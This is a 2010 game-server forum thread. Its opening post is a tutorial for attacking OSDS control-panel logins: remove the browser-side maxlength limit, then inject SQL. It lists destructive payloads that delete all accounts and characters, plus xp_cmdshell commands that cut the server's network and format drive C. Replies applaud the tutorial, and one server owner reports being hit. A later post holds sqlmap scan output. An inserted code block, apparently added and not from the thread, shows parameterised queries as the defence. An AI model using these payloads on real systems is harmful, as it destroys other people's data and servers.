[Tutorial]How to SQL inject into a server with OSDS

02/04/2010 13:57 Zombe#1
This is a nice trick on how to bypass janvier's anti-SQL-injection that he put into OSDS, in just a few steps.

First, get [link].
Find a server that has an OSDS control panel and go to the panel login page.
Now, janvier's anti-SQL-injection comes in. You can't write more than 12 letters, so you can't inject anything decent...
So here's what we do. Press Ctrl+U to open up the source code and press Ctrl+F to open up search in the source code. Search for "maxlength" (without the quotes). You will come to something like
HTML Code:
maxlength='12'
So delete that parameter.
Not the whole input, just the maxlength parameter, so the line
HTML Code:
<input type='text' name='accname' maxlength='12' />
should look like
HTML Code:
<input type='text' name='accname' />
Then, press "Apply Changes" at the top, and close the source code tab.
Hooray! We can write as long as we want ^^

And from now on, we inject the same way as we would normally.
Note: After the page is refreshed, you have to remove maxlength again.

After you inject, you should see a screen like this:

A few good injections:
Code:
a' DELETE FROM character..user_character--
(Deletes all characters)
Code:
a' DELETE FROM account..Tbl_user DELETE FROM character..USER_PROFILE--
(Deletes all accounts)

And for the more drastic ones:
Code:
a' exec master..xp_cmdshell 'ipconfig /release'--
(Disconnects the internet from the server)
Code:
a' exec master..xp_cmdshell 'format "C:/"'--
(Formats drive C)

Janvier, I hope your CMS is protected a little better... Haven't tried it on CMS yet.

IMPORTANT:
SQL injections are illegal, and if you do so, you do so on your own free will, knowing that legal action may be taken.
This tutorial's maker does not take any blame for the damage this may have caused. If users are to use this, they do so on their own will. This tutorial was made for teaching purposes only. User discretion is advised.
02/04/2010 14:01 draegon71#2
Thank you Zombe for your awesome tutorial. You deserve much more than a big Thanks.
Remember, this is illegal so don't abuse too much ...
Vote for sticky.
[x]Ruin every thread made by janvier123
02/04/2010 14:09 Zombe#3
Quote:
Originally Posted by draegon71
[x]Ruin every thread made by janvier123
Well, that goal is just a joke, but honestly, it made me laugh now :D
02/04/2010 14:11 pieter#4
thanks for not using the format thing yet zombe!

removing osds now ;)
02/04/2010 14:12 Zombe#5
Quote:
Originally Posted by pieter
thanks for not using the format thing yet zombe!

removing osds now ;)
Lol, sry for ur server. I was just testing, didn't really think janvier's protection was so weak, I was 95% sure it won't work... Sorry for ur server, RLY sorry... :(
If anything, I can DEV for u a while to help you get your players back.

I'll also make a tutorial on how to prevent SQL injections. But I have to think of a decent way myself first.
02/04/2010 14:15 pieter#6
I'm running it on leeched files, it wouldn't be honest to ask u to dev on another person's files :)

Oh, and I back up all databases every 30 minutes, because I didn't trust the 1click.

It's a fun server, nothing big or commercial lol, still thanks for the advertising lol ;)
02/04/2010 14:34 Zombe#7
Quote:
Originally Posted by pieter
I'm running it on leeched files, it wouldn't be honest to ask u to dev on another person's files :)

Oh, and I back up all databases every 30 minutes, because I didn't trust the 1click.

It's a fun server, nothing big or commercial lol, still thanks for the advertising lol ;)
****, didn't think about advertising... Forgot to blur the link >_>
I'll do that in a little while.
02/04/2010 14:49 pieter#8
Awww, and I was about to hit report on you _O-

Nah, it's back up, disabled OSDS and registration for the time being (had the same bug).
02/04/2010 15:54 janvier123#9
I hate you now zombe :)
02/04/2010 16:04 Zombe#10
Quote:
Originally Posted by janvier123
I hate you now zombe :)
Just add some protection, like preparing queries, etc ^^
You should thank me for pointing out ur mistake ;)
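The remedy Zombe points to here ("preparing queries"), together with the server-side counterpart of the maxlength check that post #1 shows being edited out of the page, as an added example that is not part of this thread or of OSDS: a parameterised account lookup with the 12-character limit enforced on the server, run against an in-memory SQLite table. The table name follows the thread (Tbl_user); the column names, seed rows and the regex are assumptions made for the example, and the payload shape is the one from post #1.

```python
import re
import sqlite3

# Constructed fixture: the table name follows the thread (account..Tbl_user);
# column names and rows are assumptions made for this example.
SCHEMA = "CREATE TABLE Tbl_user (accname TEXT PRIMARY KEY, pw_hash TEXT)"
SEED = [("zombe", "hash1"), ("pieter", "hash2")]

# The same limit the HTML maxlength='12' expressed, enforced where it counts.
MAX_ACCNAME = 12
ACCNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,%d}$" % MAX_ACCNAME)


def open_db():
    """In-memory SQLite stand-in for the panel's account database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO Tbl_user VALUES (?, ?)", SEED)
    return conn


def validate_accname(accname):
    """Server-side check: the browser's maxlength is advisory, the thread
    shows it being deleted from the page source before submitting."""
    return bool(ACCNAME_RE.match(accname))


def build_query_unsafe(accname):
    """What string concatenation would hand to the database (assumed, not the
    panel's real code): a quote in the input ends the literal and the rest
    is parsed as SQL. Built for contrast only, never executed here."""
    return "SELECT pw_hash FROM Tbl_user WHERE accname = '" + accname + "'"


def bound_lookup(conn, accname):
    """Parameterised lookup: the value travels separately from the statement,
    so a quote or a trailing second statement in it is just characters."""
    row = conn.execute(
        "SELECT pw_hash FROM Tbl_user WHERE accname = ?", (accname,)
    ).fetchone()
    return row[0] if row else None


def login_lookup(conn, accname):
    """Both layers: reject malformed names early, bind whatever passes."""
    if not validate_accname(accname):
        return None
    return bound_lookup(conn, accname)


def row_count(conn):
    return conn.execute("SELECT COUNT(*) FROM Tbl_user").fetchone()[0]
```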
02/04/2010 23:58 EliteWarrior#11
Well, good job to Zombe, but I already knew it was vulnerable to SQL injection. Try to perfect your script janvier123, this is the main reason I'm not using it.
02/05/2010 00:56 ҉ THT ҉#12
This means: OSDS = DIE
Thanks to zombie xD LOL
02/05/2010 07:58 Zombe#13
Tested and works on CMS ^^
02/05/2010 10:23 janvier123#14
Analysing URL [/dkcms/V0.1/?dkcms=main]

[+] working on dkcms
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[+] Method: SQL Blind Statement Injection
[+] Method: SQL Blind String Injection
--- No results here means that SQLiX found no injection point ---


--- Now sqlmap will test your url ---

[*] starting at: 09:21:09

[09:21:09] [INFO] testing connection to the target url
[09:21:10] [INFO] testing if the url is stable, wait a few seconds
[09:21:14] [INFO] url is stable
[09:21:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[09:21:15] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[09:21:15] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
[09:21:16] [WARNING] Cookie parameter 'PHPSESSID' is not dynamic
[09:21:16] [INFO] testing if GET parameter 'dkcms' is dynamic
[09:21:18] [INFO] confirming that GET parameter 'dkcms' is dynamic
[09:21:20] [INFO] GET parameter 'dkcms' is dynamic
[09:21:20] [INFO] testing sql injection on GET parameter 'dkcms' with 0 parenthesis
[09:21:20] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:21] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:21] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:22] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:22] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:24] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:24] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:25] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:25] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:26] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:26] [INFO] GET parameter 'dkcms' is not injectable with 0 parenthesis
[09:21:26] [INFO] testing sql injection on GET parameter 'dkcms' with 1 parenthesis
[09:21:26] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:27] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:27] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:29] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:29] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:30] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:30] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:31] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:31] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:32] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:32] [INFO] GET parameter 'dkcms' is not injectable with 1 parenthesis
[09:21:32] [INFO] testing sql injection on GET parameter 'dkcms' with 2 parenthesis
[09:21:32] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:34] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:34] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:35] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:35] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:36] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:36] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:37] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:37] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:38] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:38] [INFO] GET parameter 'dkcms' is not injectable with 2 parenthesis
[09:21:38] [INFO] testing sql injection on GET parameter 'dkcms' with 3 parenthesis
[09:21:38] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:40] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:40] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:41] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:41] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:42] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:42] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:43] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:43] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:45] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:45] [INFO] GET parameter 'dkcms' is not injectable with 3 parenthesis
[09:21:45] [WARNING] GET parameter 'dkcms' is not injectable


Too bad zombe :)
02/05/2010 12:30 draegon71#15
Yep, it's working on dkcms too ... FAIL
I tested it on my server ^^